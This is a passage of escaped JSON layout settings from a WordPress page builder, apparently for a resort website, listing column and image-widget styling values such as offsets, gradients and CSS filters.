"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d643c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0b34039\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0408d03\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a474735\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"a0b27ca\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3540.jpg\",\"id\":489},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eb81b03\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"custom_height\":{\"unit\":\"px\",\"size\":400,\"sizes\":[]},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"custom_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"structure\":\"40\",\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7aa2fd3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e596e7c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b1b9de5\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"shape_divider_top_width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_top_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"shape_divider_bottom_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[{\"id\":\"b77d62a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b5efcf7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"92f19c4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6947ee9\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"